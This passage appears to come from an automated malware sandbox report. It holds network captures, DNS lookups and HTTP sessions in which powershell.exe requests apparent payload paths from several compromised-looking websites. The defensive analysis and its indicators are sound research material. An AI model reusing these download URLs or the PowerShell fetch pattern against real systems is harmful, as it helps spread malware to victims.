                                              May 18, 2021 15:54:18.388613939 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.431705952 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.691184998 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.691226006 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.691251040 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.691268921 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.691291094 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.691313982 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.691337109 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.691354036 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.691368103 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.691397905 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.691423893 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.691993952 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.692048073 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.692110062 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.692975998 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.693022966 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.693079948 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.693990946 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.694030046 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.694099903 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.694916010 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.695009947 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.695075989 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.695875883 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.695914984 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.695979118 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.696840048 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.696882010 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.696933985 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.697856903 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.697889090 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.697931051 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.698748112 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.698769093 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.698832989 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.699724913 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.699750900 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.699795961 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.700686932 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.700714111 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.700763941 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.701675892 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.701704025 CEST44349738172.67.223.27192.168.2.3
                                              May 18, 2021 15:54:18.701750040 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:18.921891928 CEST4973980192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:18.966567039 CEST8049739143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:18.966800928 CEST4973980192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:18.966902018 CEST4973980192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:18.982676983 CEST8049739143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:18.982800007 CEST4973980192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:19.010358095 CEST8049739143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:19.010704041 CEST8049739143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:19.113037109 CEST49740443192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:19.119142056 CEST4973980192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:19.154850960 CEST44349740143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:19.154974937 CEST49740443192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:19.155503988 CEST49740443192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:19.183262110 CEST44349740143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:19.183357000 CEST49740443192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:19.197204113 CEST44349740143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:19.199800014 CEST44349740143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:19.199820995 CEST44349740143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:19.199836016 CEST44349740143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:19.199994087 CEST49740443192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:19.203941107 CEST44349740143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:19.204684973 CEST49740443192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:19.210295916 CEST49740443192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:19.252477884 CEST44349740143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:19.252568960 CEST44349740143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:19.256582975 CEST49740443192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:19.298496962 CEST44349740143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:19.919339895 CEST44349740143.204.98.64192.168.2.3
                                              May 18, 2021 15:54:20.001255035 CEST4974180192.168.2.3159.65.89.222
                                              May 18, 2021 15:54:20.060249090 CEST8049741159.65.89.222192.168.2.3
                                              May 18, 2021 15:54:20.060380936 CEST4974180192.168.2.3159.65.89.222
                                              May 18, 2021 15:54:20.060494900 CEST4974180192.168.2.3159.65.89.222
                                              May 18, 2021 15:54:20.119230986 CEST49740443192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:20.119601011 CEST8049741159.65.89.222192.168.2.3
                                              May 18, 2021 15:54:20.119771004 CEST8049741159.65.89.222192.168.2.3
                                              May 18, 2021 15:54:20.244339943 CEST4974180192.168.2.3159.65.89.222
                                              May 18, 2021 15:54:20.449944019 CEST49740443192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:20.450090885 CEST4973980192.168.2.3143.204.98.64
                                              May 18, 2021 15:54:20.450156927 CEST4974180192.168.2.3159.65.89.222
                                              May 18, 2021 15:54:20.450567961 CEST49738443192.168.2.3172.67.223.27
                                              May 18, 2021 15:54:20.451383114 CEST4973780192.168.2.345.116.14.210
                                              May 18, 2021 15:54:20.451523066 CEST4973680192.168.2.3162.241.148.243

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
May 18, 2021 15:53:38.350147009 CEST | 216.127.164.209 | 192.168.2.3 | 3d19 | (Unknown) | Destination Unreachable
May 18, 2021 15:53:41.348105907 CEST | 216.127.164.209 | 192.168.2.3 | 3d19 | (Unknown) | Destination Unreachable
May 18, 2021 15:53:47.368138075 CEST | 216.127.164.209 | 192.168.2.3 | 3d19 | (Unknown) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 18, 2021 15:53:37.906606913 CEST | 192.168.2.3 | 8.8.8.8 | 0xbefc | Standard query (0) | admintk.com | A (IP address) | IN (0x0001)
May 18, 2021 15:53:59.271992922 CEST | 192.168.2.3 | 8.8.8.8 | 0x12d7 | Standard query (0) | mikegeerinck.com | A (IP address) | IN (0x0001)
May 18, 2021 15:53:59.602370024 CEST | 192.168.2.3 | 8.8.8.8 | 0xfd4a | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001)
May 18, 2021 15:54:01.488698959 CEST | 192.168.2.3 | 8.8.8.8 | 0x73bd | Standard query (0) | freelancerwebdesignerhyderabad.com | A (IP address) | IN (0x0001)
May 18, 2021 15:54:02.042473078 CEST | 192.168.2.3 | 8.8.8.8 | 0xee | Standard query (0) | etdog.com | A (IP address) | IN (0x0001)
May 18, 2021 15:54:18.161689043 CEST | 192.168.2.3 | 8.8.8.8 | 0x1f46 | Standard query (0) | www.hintup.com.br | A (IP address) | IN (0x0001)
May 18, 2021 15:54:18.773019075 CEST | 192.168.2.3 | 8.8.8.8 | 0x667b | Standard query (0) | www.stmarouns.nsw.edu.au | A (IP address) | IN (0x0001)
May 18, 2021 15:54:19.014153957 CEST | 192.168.2.3 | 8.8.8.8 | 0x4285 | Standard query (0) | www.stmarouns.nsw.edu.au | A (IP address) | IN (0x0001)
May 18, 2021 15:54:19.926335096 CEST | 192.168.2.3 | 8.8.8.8 | 0xd412 | Standard query (0) | wm.mcdevelop.net | A (IP address) | IN (0x0001)

                                              DNS Answers

                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                              May 18, 2021 15:53:38.129832029 CEST | 8.8.8.8 | 192.168.2.3 | 0xbefc | No error (0) | admintk.com | | 216.127.164.209 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:53:59.346468925 CEST | 8.8.8.8 | 192.168.2.3 | 0x12d7 | No error (0) | mikegeerinck.com | | 35.214.199.246 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:53:59.667690992 CEST | 8.8.8.8 | 192.168.2.3 | 0xfd4a | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
                                              May 18, 2021 15:54:01.686980009 CEST | 8.8.8.8 | 192.168.2.3 | 0x73bd | No error (0) | freelancerwebdesignerhyderabad.com | | 162.241.148.243 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:54:02.113941908 CEST | 8.8.8.8 | 192.168.2.3 | 0xee | No error (0) | etdog.com | | 45.116.14.210 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:54:18.239587069 CEST | 8.8.8.8 | 192.168.2.3 | 0x1f46 | No error (0) | www.hintup.com.br | | 172.67.223.27 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:54:18.239587069 CEST | 8.8.8.8 | 192.168.2.3 | 0x1f46 | No error (0) | www.hintup.com.br | | 104.21.54.33 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:54:18.921066999 CEST | 8.8.8.8 | 192.168.2.3 | 0x667b | No error (0) | www.stmarouns.nsw.edu.au | | 143.204.98.64 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:54:18.921066999 CEST | 8.8.8.8 | 192.168.2.3 | 0x667b | No error (0) | www.stmarouns.nsw.edu.au | | 143.204.98.96 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:54:18.921066999 CEST | 8.8.8.8 | 192.168.2.3 | 0x667b | No error (0) | www.stmarouns.nsw.edu.au | | 143.204.98.119 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:54:18.921066999 CEST | 8.8.8.8 | 192.168.2.3 | 0x667b | No error (0) | www.stmarouns.nsw.edu.au | | 143.204.98.98 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:54:19.112257957 CEST | 8.8.8.8 | 192.168.2.3 | 0x4285 | No error (0) | www.stmarouns.nsw.edu.au | | 143.204.98.64 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:54:19.112257957 CEST | 8.8.8.8 | 192.168.2.3 | 0x4285 | No error (0) | www.stmarouns.nsw.edu.au | | 143.204.98.96 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:54:19.112257957 CEST | 8.8.8.8 | 192.168.2.3 | 0x4285 | No error (0) | www.stmarouns.nsw.edu.au | | 143.204.98.98 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:54:19.112257957 CEST | 8.8.8.8 | 192.168.2.3 | 0x4285 | No error (0) | www.stmarouns.nsw.edu.au | | 143.204.98.119 | A (IP address) | IN (0x0001)
                                              May 18, 2021 15:54:20.000509024 CEST | 8.8.8.8 | 192.168.2.3 | 0xd412 | No error (0) | wm.mcdevelop.net | | 159.65.89.222 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • freelancerwebdesignerhyderabad.com
                                              • etdog.com
                                              • www.stmarouns.nsw.edu.au
                                              • wm.mcdevelop.net

                                              HTTP Packets

                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              0 | 192.168.2.3 | 49736 | 162.241.148.243 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 18, 2021 15:54:01.846805096 CEST | 1625 | OUT | GET /cgi-bin/S/ HTTP/1.1
                                              Host: freelancerwebdesignerhyderabad.com
                                              Connection: Keep-Alive
                                              May 18, 2021 15:54:02.030893087 CEST | 1626 | IN | HTTP/1.1 404 Not Found
                                              Date: Tue, 18 May 2021 13:54:01 GMT
                                              Server: nginx/1.19.10
                                              Content-Type: text/html
                                              Content-Length: 583
                                              Last-Modified: Thu, 25 Feb 2021 17:54:10 GMT
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              1 | 192.168.2.3 | 49737 | 45.116.14.210 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 18, 2021 15:54:02.428850889 CEST | 1627 | OUT | GET /wp-content/nu/ HTTP/1.1
                                              Host: etdog.com
                                              Connection: Keep-Alive
                                              May 18, 2021 15:54:16.140671015 CEST | 1628 | IN | HTTP/1.1 404 Not Found
                                              Connection: Keep-Alive
                                              X-Powered-By: PHP/5.6.40
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              Content-Type: text/html; charset=UTF-8
                                              Link: <http://etdog.com/index.php/wp-json/>; rel="https://api.w.org/"
                                              Transfer-Encoding: chunked
                                              Date: Tue, 18 May 2021 13:54:15 GMT
                                              Server: LiteSpeed
                                              Vary: User-Agent
                                              Data Raw: 32 30 35 38 0d 0a 3c 21 2d 2d 20 e5 85 ac e5 85 b1 e9 a1 b6 e9 83 a8 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 e4 bb a5 e5 a4 aa e7 8b 97 e7 9f bf e6 9c ba e5 ae 98 e7 bd 91 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 6c 6c 22 3e 0d 0a 09 3c 21 2d 2d 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 65 74 64 6f 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 61 6e 64 61 6d 69 6e 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 65 74 64 6f 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 61 6e 64 61 6d 69 6e 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 65 74 64 6f 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 61 6e 64 61 6d 69 6e 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 65 74 64 6f 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 61 6e 64 61 6d 69 6e 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 77 6f 72 6b 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 74 64 6f 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 61 6e 64 61 6d 69 6e 65 72 2f 73 74 61 74 69 63 2f 63 73 73 2f 61 70 70 2e 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6f 76 65 72 66 6c 6f 77 3a 20 61 75 74 6f
                                              Data Ascii: 2058... --><!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Not Found | </title> <meta name="keywords" content=""><meta name="description" content=""><meta name="robots" content="all">... <link rel="shortcut icon" href="" type="image/x-icon" /> --> <script src="http://etdog.com/wp-content/themes/pandaminer/static/js/analytics.js"></script> <script src="http://etdog.com/wp-content/themes/pandaminer/static/js/jquery.min.js"></script> <script src="http://etdog.com/wp-content/themes/pandaminer/static/js/manifest.js"></script> <script src="http://etdog.com/wp-content/themes/pandaminer/static/js/work.js"></script> <link rel="stylesheet" href="http://etdog.com/wp-content/themes/pandaminer/static/css/app.css"> </head> <body style="overflow: auto
                                              May 18, 2021 15:54:16.140695095 CEST | 1630 | IN | Data Raw: 3b 22 3e 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 61 70 70 22 3e 0d 0a 09 09 09 3c 68 65 61 64 65 72 20 64 61 74 61 2d 76 2d 39 61 39 62 35 34 35 63 3d 22 22 20 63 6c 61 73 73 3d 22 65 6c 2d 68 65 61 64 65 72 22 20 73 74 79 6c 65 3d 22 68 65 69 67
                                              Data Ascii: ;"><div id="app"><header data-v-9a9b545c="" class="el-header" style="height: 100px;"><div data-v-9a9b545c="" class="wrapper"><a data-v-9a9b545c="" href="/" class="hd_logo"><img data-v-9a9b545c="" src="http://etdog
                                              May 18, 2021 15:54:16.140713930 CEST | 1631 | IN | Data Raw: 68 70 2f 25 65 37 25 39 66 25 62 66 25 65 36 25 39 63 25 62 61 2f 22 20 63 6c 61 73 73 3d 22 2f 2a 61 63 74 69 76 65 2a 2f 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: hp/%e7%9f%bf%e6%9c%ba/" class="/*active*/"> </a></object> </li> </a>
                                              May 18, 2021 15:54:16.140728951 CEST | 1633 | IN | Data Raw: 20 20 20 20 20 20 e5 85 b3 e4 ba 8e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6f 62 6a 65 63 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: </a></object> </li> </a>
                                              May 18, 2021 15:54:16.140759945 CEST | 1634 | IN | Data Raw: 61 6e 64 61 6d 69 6e 65 72 2f 73 74 61 74 69 63 2f 73 77 69 70 65 72 2f 6a 73 2f 73 77 69 70 65 72 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22
                                              Data Ascii: andaminer/static/swiper/js/swiper.min.js"></script><link rel="stylesheet" type="text/css" href="http://etdog.com/wp-content/themes/pandaminer/static/swiper/css/swiper.min.css"><main class="el-main"><div data-v-17045160=""><div c
                                              May 18, 2021 15:54:16.140852928 CEST | 1635 | IN | Data Raw: 22 22 20 63 6c 61 73 73 3d 22 22 3e 0a 09 09 09 09 09 09 09 09 3c 6f 62 6a 65 63 74 3e 3c 61 20 64 61 74 61 2d 76 2d 31 37 30 34 35 31 36 30 3d 22 22 20 68 72 65 66 3d 22 22 20 63 6c 61 73 73 3d 22 6d 2d 62 61 63 6b 20 62 74 6e 20 62 74 6e 4d 6f
                                              Data Ascii: "" class=""><object><a data-v-17045160="" href="" class="m-back btn btnMoreProduct"></a></object></a></div></div><div data-v-17045160="" class="f_mod_what" style="background: #333 url() 50%
                                              May 18, 2021 15:54:16.140872002 CEST | 1636 | IN | Data Raw: 6e 6b 4c 69 73 74 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 36 63 63 62 64 38 63 36 3d 22 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 53 65 63 74 69 6f 6e 22 3e 0a 09 09 09 09 09 09 09 09 3c 70 20 64 61
                                              Data Ascii: nkLists"><div data-v-6ccbd8c6="" class="linkSection"><p data-v-6ccbd8c6="" class="linkTitle"></p><a data-v-6ccbd8c6="" href="http://etdog.com/index.php/%e5%85%b3%e4%ba%8e/
                                              May 18, 2021 15:54:18.148736000 CEST | 1638 | IN | Data Raw: 31 65 37 61 0d 0a 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 46 41 51 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 6f 62 6a 65 63 74 3e 0a 09 09 09 09 09 09 09 09 09
                                              Data Ascii: 1e7a" class="link">FAQ</a></object></a></div><div data-v-6ccbd8c6="" class="linkSection"><p data-v-6ccbd8c6="" class="linkTitle">
                                              May 18, 2021 15:54:18.148777962 CEST | 1639 | IN | Data Raw: 74 3a 20 32 35 70 78 3b 0a 09 09 09 09 09 09 09 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 35 70 78 3b 0a 09 09 09 09 09 09 09 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 3b 0a 09 09 09 09 09 09 09 09 09 09 09 76 65 72 74 69 63 61
                                              Data Ascii: t: 25px;margin-right: 5px;font-size: 0;vertical-align: middle;display: inline-block;text-indent: -9999px;}</style><p data-v-6ccbd8c6="" class="linkTitle">
                                              May 18, 2021 15:54:18.148802042 CEST | 1640 | IN | Data Raw: 64 6f 67 2e 63 6f 6d 2f 22 20 63 6c 61 73 73 3d 22 22 20 3e 0a 09 09 09 09 09 09 09 09 09 45 6e 67 6c 69 73 68 0a 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 2f 0a 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 76 2d 36 63 63
                                              Data Ascii: dog.com/" class="" >English</a>/<a data-v-6ccbd8c6="" href="http://etdog.com/" class="active"></a></div><a data-v-6ccbd8c6="" href="/" class="ftLogo"><img d
                                              May 18, 2021 15:54:18.148828030 CEST | 1642 | IN | Data Raw: 95 99 e8 a8 80 2f 27 29 22 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 39 65 38 65 30 37 66 30 3d 22 22 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 70 20 64 61 74 61 2d 76 2d 39 65 38 65 30 37 66 30 3d 22 22
                                              Data Ascii: /')"><div data-v-9e8e07f0=""></div><p data-v-9e8e07f0=""></p></li><li data-v-9e8e07f0="" class="box_code"><div data-v-9e8e07f0=""></div><p data-v-9e8e07f0=""


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              2 | 192.168.2.3 | 49739 | 143.204.98.64 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 18, 2021 15:54:18.966902018 CEST | 1687 | OUT | GET /paypal/b8G/ HTTP/1.1
                                              Host: www.stmarouns.nsw.edu.au
                                              Connection: Keep-Alive
                                              May 18, 2021 15:54:19.010704041 CEST | 1688 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: CloudFront
                                              Date: Tue, 18 May 2021 13:54:19 GMT
